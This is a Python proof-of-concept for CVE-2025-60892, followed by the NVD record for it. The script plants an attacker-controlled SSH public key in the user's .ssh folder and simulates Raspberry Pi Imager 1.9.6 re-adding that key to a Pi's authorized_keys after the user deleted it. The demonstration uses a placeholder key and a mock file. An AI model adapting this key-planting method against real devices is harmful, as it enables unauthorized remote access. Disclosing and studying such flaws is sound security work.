CVE-2025-60892

# CVE-2025-60892 PoC - Raspberry Pi Imager Key Re-addition Attack # This PoC demonstrates the vulnerability where Raspberry Pi Imager # re-adds deleted SSH public keys during OS customization import os import shutil from pathlib import Path def setup_malicious_key(): """ Setup phase: Place a malicious SSH public key in user's .ssh directory This simulates an attacker with local access to the Windows system """ user_ssh_dir = Path.home() / '.ssh' user_ssh_dir.mkdir(exist_ok=True) # Malicious public key (attacker controls the corresponding private key) malicious_pub_key = "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQC7...attacker_key" with open(user_ssh_dir / 'id_rsa.pub', 'w') as f: f.write(malicious_pub_key) print(f"[+] Placed malicious key in {user_ssh_dir / 'id_rsa.pub'}") def simulate_imager_behavior(): """ Simulates Raspberry Pi Imager's vulnerable behavior: Re-reading and re-adding the public key even after user deletion """ user_ssh_dir = Path.home() / '.ssh' authorized_keys_path = Path('/tmp/pi_authorized_keys') # Simulated target # Simulate user deleting the key from imager UI print("[*] User deletes the SSH key from Raspberry Pi Imager UI...") # Simulate imager reading local id_rsa.pub local_key_path = user_ssh_dir / 'id_rsa.pub' if local_key_path.exists(): with open(local_key_path, 'r') as f: key_content = f.read() # VULNERABILITY: Imager re-adds the key despite user deletion print("[!] VULNERABILITY: Raspberry Pi Imager re-adds the key!") print(f"[*] Writing key to {authorized_keys_path}") with open(authorized_keys_path, 'a') as f: f.write(key_content + '\n') print("[+] Malicious key has been re-added to authorized_keys") print("[*] Attacker can now use their private key to access the Raspberry Pi") def cleanup(): """Cleanup test artifacts""" cleanup_path = Path.home() / '.ssh' / 'id_rsa.pub' if cleanup_path.exists(): cleanup_path.unlink() print("[*] Cleaned up test key") if __name__ == '__main__': print("=== CVE-2025-60892 PoC ===") print("Raspberry Pi Imager Public Key Re-addition Vulnerability\n") setup_malicious_key() simulate_imager_behavior() cleanup() print("\n[!] Note: This PoC demonstrates the vulnerability concept.") print("[!] Real attack requires:") print(" 1. Local access to Windows system") print(" 2. User using Raspberry Pi Imager 1.9.6") print(" 3. Attacker possesses corresponding private key")

{"cve": {"id": "CVE-2025-60892", "sourceIdentifier": "[email protected]", "published": "2025-11-03T15:15:36.040", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "An issue in Raspberry Pi Imager version 1.9.6 for Windows, affecting its OS customization feature. The imager's 'public-key authentication' setting unintentionally re-adds a user's id_rsa.pub key from their local Windows machine to the authorized_keys file on the Raspberry Pi, even after the user explicitly deletes the key from the user interface. This creates an unintended attack surface, as it could allow an attacker to use a different key than the intended one to login to the device."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N", "baseScore": 6.8, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.5, "impactScore": 4.2}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-200"}]}], "references": [{"url": "https://github.com/raspberrypi/rpi-imager/issues/1185", "source": "[email protected]"}]}}